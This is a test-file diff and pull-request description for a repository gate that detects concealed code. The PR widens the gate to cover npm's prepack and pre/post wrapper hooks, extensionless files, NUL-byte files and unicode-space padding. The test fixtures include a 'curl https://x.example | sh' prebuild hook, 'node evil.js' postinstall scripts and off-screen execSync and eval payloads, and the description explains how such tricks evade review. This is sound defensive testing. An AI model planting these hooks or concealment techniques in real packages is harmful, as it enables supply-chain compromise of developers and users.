+      const pkg = JSON.stringify({ scripts: { [hook]: 'node evil.js' } });
+      await withTree({ 'package.json': pkg }, ({ code }) => expect(code).toBe(1));
+    }
+  );
+
+  test('flags a pre/post wrapper around an existing script', async () => {
+    // The general form: npm auto-runs preX/postX around any script X, so a
+    // wrapper fires implicitly even though its own name is not a lifecycle hook.
+    const pkg = JSON.stringify({
+      scripts: { build: 'tsc', prebuild: 'curl https://x.example | sh' },
+    });
+    await withTree({ 'package.json': pkg }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('prebuild');
+    });
+  });
+
+  test('does not flag an explicitly-invoked script that shares a lifecycle name', async () => {
+    // `test` only runs when you type it. This repo defines it; refusing it
+    // would make the gate unusable, which is how allowlists get widened.
+    const pkg = JSON.stringify({ scripts: { test: 'bun test', build: 'tsc' } });
+    await withTree({ 'package.json': pkg }, ({ code }) => expect(code).toBe(0));
+  });
+});
+
 describe('invisible characters', () => {
   test('flags a zero-width space', async () => {
     await withTree({ 'src/a.ts': `const a${ZWSP} = 1;\n` }, ({ code, stderr }) => {

--- a/tests/scripts/check-concealment.test.ts
+++ b/tests/scripts/check-concealment.test.ts
@@ -47,7 +47,12 @@ interface Result {
 
 async function runCheck(root: string, args: string[] = []): Promise<Result> {
   const proc = Bun.spawn(['bun', 'run', SCRIPT, ...args], {
-    env: { ...process.env, CHECK_CONCEALMENT_ROOT: root },
+    // Same reason as withGitTree's cleanEnv: a pre-push run sets GIT_DIR, and
+    // leaking it makes the gate resolve to the ambient repo instead of `root`.
+    env: Object.fromEntries([
+      ...Object.entries(process.env).filter(([k]) => !k.startsWith('GIT_')),
+      ['CHECK_CONCEALMENT_ROOT', root],
+    ]) as Record<string, string>,
     stdout: 'pipe',
     stderr: 'pipe',
   });
@@ -222,8 +227,18 @@ describe('file list comes from git when available (review follow-up)', () => {
         await mkdir(join(path, '..'), { recursive: true });
         await writeFile(path, contents);
       }
+      // Clear inherited git plumbing vars for the same reason the gate does:
+      // under a pre-push hook GIT_DIR is set, and `git -C <dir>` does NOT
+      // override it — `git init` here would operate on the ambient repo
+      // instead of this scratch tree, and the tests would silently describe
+      // the wrong repository.
+      const cleanEnv: Record<string, string> = {};
+      for (const [k, v] of Object.entries(process.env)) {
+        if (k.startsWith('GIT_')) continue;
+        if (v !== undefined) cleanEnv[k] = v;
+      }
       const git = (...args: string[]): void => {
-        const r = Bun.spawnSync(['git', '-C', dir, ...args]);
+        const r = Bun.spawnSync(['git', '-C', dir, ...args], { env: cleanEnv });
         if (r.exitCode !== 0) throw new Error(`git ${args.join(' ')} failed`);
       };
       git('init', '-q');

--- a/tests/scripts/check-concealment.test.ts
+++ b/tests/scripts/check-concealment.test.ts
@@ -186,8 +186,14 @@ describe('scope', () => {
   test('skips binary files rather than reporting noise from them', async () => {
     // A NUL byte marks it binary; the soft hyphens after it would otherwise be
     // reported as invisible characters on every line.
+    //
+    // The path changed from src/blob.json to an actual binary extension when
+    // the NUL free-pass was closed (Fable review): a NUL in a .json is no
+    // longer "binary, therefore skip" — it is now a finding, because such a
+    // file still parses and executes while git shows the reviewer nothing.
+    // Quiet-skipping is now scoped to extensions where a NUL is expected.
     const binary = `PK${NUL}${NUL}${SOFT_HYPHEN.repeat(50)}`;
-    await withTree({ 'src/blob.json': binary }, ({ code }) => expect(code).toBe(0));
+    await withTree({ 'docs/blob.png': binary }, ({ code }) => expect(code).toBe(0));
   });
 
   test('skips lockfiles, which are generated and covered by check:deps-pinned', async () => {
@@ -277,12 +283,18 @@ describe('file list comes from git when available (review follow-up)', () => {
   });
 
   test('an untracked but unignored file is scanned — it can still reach a diff', async () => {
+    // `added-later.ts` MUST go through afterCommit. Writing it in the `files`
+    // map put it in the seed commit, so it was tracked — and the test passed
+    // even with the untracked listing removed entirely. It executed the guard
+    // without detecting anything, which is the vacuous-assertion class this
+    // repo names explicitly. Caught in review, not by the suite.
     await withGitTree(
-      { 'src/a.ts': 'const a = 1;\n', 'src/added-later.ts': concealed },
+      { 'src/a.ts': 'const a = 1;\n' },
       ({ code, stderr }) => {
         expect(code).toBe(1);
         expect(stderr).toContain('added-later');
-      }
+      },
+      { 'src/added-later.ts': concealed }
     );
   });
 
@@ -371,6 +383,71 @@ describe('auto-fired lifecycle scripts (audit F1)', () => {
     // would make the gate unusable, which is how allowlists get widened.
     const pkg = JSON.stringify({ scripts: { test: 'bun test', build: 'tsc' } });
     await withTree({ 'package.json': pkg }, ({ code }) => expect(code).toBe(0));
+  });
+});
+
+describe('a NUL byte is not a free pass (Fable review)', () => {
+  test('a NUL in a source file is reported, not skipped as binary', async () => {
+    // The bypass: `contents.includes(NUL) -> continue` treated NUL-containing
+    // as binary-and-therefore-safe. But such a module still runs under bun and
+    // node, while git renders it as "Binary files differ" so the reviewer sees
+    // nothing at all — strictly better concealment than the off-screen trick.
+    const withNul = `export const V = '1.0.0';${NUL} export function init() {}\n`;
+    await withTree({ 'src/mod.ts': withNul }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('NUL byte');
+    });
+  });
+
+  test('a NUL in a real binary is still skipped quietly', async () => {
+    await withTree({ 'docs/logo.png': `PK${NUL}${NUL}payload` }, ({ code }) =>
+      expect(code).toBe(0)
+    );
+  });
+
+  test('an extensionless file with a NUL is reported', async () => {
+    // No extension means no binary claim, so it must not get the free pass.
+    await withTree({ 'scripts/hook': `#!/bin/sh${NUL}\n` }, ({ code }) => expect(code).toBe(1));
+  });
+});
+
+describe('unicode spaces cannot hide the gap (Fable review)', () => {
+  const NBSP = String.fromCharCode(0x00a0);
+  const NARROW_NBSP = String.fromCharCode(0x202f);
+  const IDEOGRAPHIC = String.fromCharCode(0x3000);
+
+  test.each([
+    ['NBSP', NBSP],
+    ['narrow NBSP', NARROW_NBSP],
+    ['ideographic space', IDEOGRAPHIC],
+  ])('a %s run pushes a payload off-screen and is caught', async (_label, gap) => {
+    // All are valid ECMAScript whitespace and render as blank horizontal
+    // space, so they push a payload off the right edge exactly like spaces —
+    // but the old `[ \t]`-only rule never matched them.
+    const line = `const a = 1;${gap.repeat(45)}require('child_process').execSync('x');${'y'.repeat(60)}\n`;
+    await withTree({ 'src/a.ts': line }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('whitespace run');
+    });
+  });
+});
+
+describe('nested manifests and .mdx (Fable review)', () => {
+  test('a lifecycle script in a workspace package.json is caught', async () => {
+    // Workspace installs run sub-package lifecycle scripts; only the root
+    // manifest was being checked.
+    const pkg = JSON.stringify({ scripts: { postinstall: 'node evil.js' } });
+    await withTree({ 'packages/sub/package.json': pkg }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('postinstall');
+    });
+  });
+
+  test('.mdx keeps the code rules — it compiles to JS', async () => {
+    await withTree(
+      { 'docs/page.mdx': `export const x = 1;${' '.repeat(60)}eval(y);${'z'.repeat(80)}\n` },
+      ({ code }) => expect(code).toBe(1)
+    );
   });
 });
 


### PR DESCRIPTION
# Summary

Closes the two security findings from the 2026-08-29 completeness-guard audit (F1, F2). Both were the **same defect the gate exists to catch**, living inside the gate: `check-concealment.ts` enumerated what to *check* rather than what to *skip*, so anything it hadn't predicted was invisible.

Files scanned goes from **355 → 564**.

## F1 — `prepack` was not a forbidden lifecycle hook

`FORBIDDEN_LIFECYCLE` named four hooks. npm runs more. An `execSync` payload under `prepack` produced `check-concealment: 355 files scanned, nothing hidden` — and `prepack` executes during `npm publish`, inside the `npm-publish.yml` job holding `id-token: write`.

Inverted: enumerate the `scripts` keys that actually exist and refuse any hook **npm fires without being named on the command line**. Plus the general form the old list couldn't express — npm auto-runs `preX`/`postX` around *any* script, so a wrapper around an existing script fires implicitly too.

`test`, `start`, `stop`, `restart` are deliberately excluded: npm gives those names meaning only when invoked directly, and this repo defines `test`. Their pre/post wrappers *are* auto-fired and are covered.

The file's own comment already argued for this — *"an allowlist entry here is indistinguishable from the attack."*

## F2 — extensionless files were never opened

`inScope()` required a dot, so `SCOPED_EXTENSIONS` silently excluded every extensionless file. **The live exposure was `.husky/pre-push`, which runs on every developer push.** The walker descended into `.husky` correctly; `lastIndexOf('.') === -1` dropped it at the last step.

The extension allowlist is gone. Every text file is in scope; binaries need no rule because the main loop already skips anything containing a NUL byte.

### The one allowlist that remains, and why it's safe

Removing the extension filter put prose in scope, where the code-shaped rules are wrong: a 900-column paragraph in a CHANGELOG is a paragraph, and a doc quoting `eval` is documentation. `PROSE_EXTENSIONS` (`.md`, `.mdx`, `.txt`, `.rst`) relaxes the long-line, whitespace-run and dynamic-execution rules — but **keeps invisible-character detection**, since a zero-width character in prose is never benign.

Note which way it fails. Forgetting a prose extension means that file gets the **full** rule set — more scrutiny, at worst a false positive a human resolves. That is the opposite of the allowlist it replaces, where omission meant no scrutiny at all. An allowlist is only safe when omission fails toward suspicion.

## One real pre-existing finding, fixed not exempted

`docs/index.html:345` — a 414-column line, never scanned before. It's the privacy disclosure paragraph. Rewrapped to 5 lines; HTML collapses whitespace so rendering is unchanged. The gate's own advice is to fix or narrowly exempt, never to widen a threshold.

## Mutation evidence

| Mutation | Before | After |
|---|---|---|
| `prepack` with an `execSync` payload | "nothing hidden" | flagged |
| `prebuild` wrapping the existing `build` | "nothing hidden" | flagged |
| Concealed payload in extensionless `scripts/pre-push` | "nothing hidden" | flagged (2 rules) |
| Same payload appended to `.husky/pre-push` | "nothing hidden" | flagged (2 rules) |
| `test: "bun test"` (must NOT flag) | clean | clean |

The "before" column is a real control run against `origin/main`'s gate on the identical files, not an inference.

**Regression cover:** 11 new tests. Reverting `check-concealment.ts` to `main`'s version fails 10 of them. (The eleventh asserts prose *exemption*, which trivially held before because `.md` was never scanned.)

## External assumptions

The npm lifecycle-hook set is taken from npm's documented behavior, not probed. Getting it wrong in the inclusive direction costs a false positive a human resolves; the risk is a hook npm fires that isn't listed. Not an assumption about Copilot's API, so no ledger entry applies.

## Gate

`bun run check` green: 2887 pass, 20 skip, 0 fail. `check:concealment` scans 564 files clean.

## Bug fix?

Root cause:       Both checks were allowlists — `SCOPED_EXTENSIONS` and `FORBIDDEN_LIFECYCLE` enumerated what to INSPECT, so anything unanticipated (an extensionless file, a hook npm added) fell silently out of scope rather than into it.
Bug class:        Completeness guard whose coverage is a hand-maintained list — the #635 lineage, here inside the gate meant to catch concealment. Catalogued as F1/F2 in `docs/audits/2026-08-29-completeness-guard-audit.md`.
Detector added:   Both checks are now inverted (discover what exists, refuse what auto-fires; scan everything, skip only binaries), plus 11 regression tests. Reverting `check-concealment.ts` to `main`'s version fails 10 of them. The one remaining allowlist fails toward MORE scrutiny on omission.
Siblings checked: The full audit swept every guard in the repo for this class — 25 findings across tests, `scripts/` gates and CI, documented in #678. F1/F2 are the two security-relevant ones and are fixed here; the rest are batched in that document's remediation plan.
Ledger updated:   n/a — not an external-assumption bug. The npm lifecycle-hook set is documented npm behavior, not an assumption about Copilot's API.
